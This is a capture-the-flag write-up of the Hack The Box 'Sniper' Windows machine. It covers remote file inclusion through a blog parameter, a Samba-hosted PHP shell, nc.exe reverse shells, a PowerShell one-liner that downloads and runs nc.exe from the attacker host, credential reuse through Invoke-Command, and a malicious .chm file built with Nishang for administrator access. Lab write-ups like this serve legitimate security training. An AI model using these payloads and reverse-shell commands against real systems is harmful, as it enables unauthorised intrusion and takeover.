Hack the box(HTB) Sniper write up

0
(0)

Steps

  1. Nmap scan
  2. Finding RFI
  3. Setting up Samba server
  4. Getting reverse shell
  5. Privilege escalation(Getting user.txt)
  6. Basic enumeration
  7. Making malicious .chm file
  8. Getting the reverse shell(Getting root.txt)

Commands used

  1. nmap -sC -sV -oV 10.10.10.151
  2. nano /etc/samba/smb.conf
  3. service smbd start
  4. nc.exe 10.10.14.39 4444 -e cmd.exe
  5. powershell
  6. $username = ‘SNIPER\Chris’
  7. $password = ’36mEAhz/B8xQ~2VM’
  8. $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
  9. $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
  10. Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c “C:\tmp\nc.exe” -e powershell 10.10.14.39 1234 }
  11. import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"(Locally)
 
 
 
 

NMAP Scan

Nmap 7.70 scan initiated Wed Feb  5 09:25:46 2020 as: nmap -sC -sV -oV 10.10.10.151
Nmap scan report for 10.10.10.151
Host is up (0.64s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-security-mode: | 2.02: | Message signing enabled but not required
| smb2-time:
| date: 2020-02-05 16:28:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Feb 5 09:28:53 2020 -- 1 IP address (1 host up) scanned in 186.70 seconds
Hack the box(HTB) Sniper write up

Finding RFI

So we have port 80 open so lets just see whats on the website.

Hack the box(HTB) Sniper write up

After enumerating further I found RFI(Remote file inclusion) on the /blogs on the website

Hack the box(HTB) Sniper write up

when i change the language i see a RFI so that was the initial foothold.

http://10.10.10.151/blog/?lang=blog-en.php

SO now it was time for getting a shell .For this I used a script.Here is the link.

https://github.com/incredibleindishell/Mannu-Shell/blob/master/mannu.php 

.And all credit goes to the writer of the script .I used this because its easy to use.

Another method can making on php file and present it on our samba server.

Setting up Samba server

So now our first step is configuration of samba server.

So now we have to find the file smb.conf

Hack the box(HTB) Sniper write up
nano /etc/samba/smb.conf

Here is my smb.conf

[email protected]:/etc/samba# cat smb.conf 
[global]:
security = user
map to guest = bad user
bind interfaces only = yes
encrypt passwords = yes
name resolve order = bcast host
workgroup = WORKGROUP
winbind use default domain = yes
dns proxy = no
server string = Samba Server %v
winbind trusted domains only = yes
null passwords = yes
netbios name = indishell-lab
[public]:
force user = nobody
path = /root/Desktop
public = yes
writeable = yes
directory mask = 0755
create mask = 0644
browseable = yes

Now we can start or samba server.

[email protected]:~/Desktop/htb# service smbd start

I specified the path in .conf file as /root/Desktop so my file is on Desktop first lets do it with mannu.php from indishell . I have given the link above.

name of share in my .conf file is public so don’t get confuse .

Getting reverse shell

http://10.10.10.151/blog/?lang=\10.10.14.39\public\mannu.php
http://10.10.10.151/blog/?lang=\local_ip\share_name\file_name
Hack the box(HTB) Sniper write up

Now we can just make a tmp directory and upload a nc.exe. The usage is simple so can understand it easily.

Now lets get a reverse shell.

Hack the box(HTB) Sniper write up

And we got a reverse shell.

Hack the box(HTB) Sniper write up

We can do it by making our own .php file

<?php shell_exec('powershell iwr -uri 10.10.14.39:8000/nc.exe -o C:\Windows\Temp\nc.exe;C:\Windows\Temp\nc.exe -e powershell 10.10.14.39 4444')?>
This lets us intsall nc.exe and get reverse shell back on our local machine.

After some enumeration i got db.php which contained creds for Chris.

Hack the box(HTB) Sniper write up

Privilege escalation(Getting user.txt)

So now its time to jump to chris user.

$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-command -computername SNIPER -credential $credential -scriptblock { cmd.exe /c "C:\tmp\nc.exe" -e powershell 10.10.14.39 1234 }
Hack the box(HTB) Sniper write up

So now we got shell as chris and also got the user flag.

Hack the box(HTB) Sniper write up

Basic enumeration

After some enumeration i found a note.txt

PS C:\users\chris\Downloads> ls ls     Directory: C:\users\chris\Downloads Mode                LastWriteTime         Length Name                                                                   ----                -------------         ------ ----                                                                   -a----        4/11/2019   8:36 AM          10462 instructions.chm                                                       PS C:\users\chris\Downloads>  
PS C:> cd Docs
cd Docs
PS C:\Docs> ls
ls
Directory: C:\Docs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf
PS C:\Docs> cat note.txt
cat note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
PS C:\Docs>

I think these information are enough to understand that chirs boss whats a .chm file in the /docs directory.

So we can now make a malicious file and upload it to docs and when boss will run it we will be admin.

Making malicious .chm file

So i got a file on github https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

Now to compile the file we need to run it in windows box.

Once we have downloaded it we can create a malicious .chm file

import-module .\out.chm.ps1;out-chm -Payload "C:\tmp\nc.exe -e powershell 10.10.14.39 8888" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Getting the reverse shell(Getting root.txt)

Now we just have to move our file to docs.

So now we can listen on nc -nlpv 8888

[email protected]:~/Desktop/htb/sniper# nc -nlvp 8888
listening on [any] 8888 …
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.151] 49959
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
sniper\administrator
PS C:\Windows\system32>
So now we got shell as admin.

PS C:\users\Administrator\Desktop> cat root.txt
cat root.txt
5624***c15
PS C:\users\Administrator\Desktop>

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin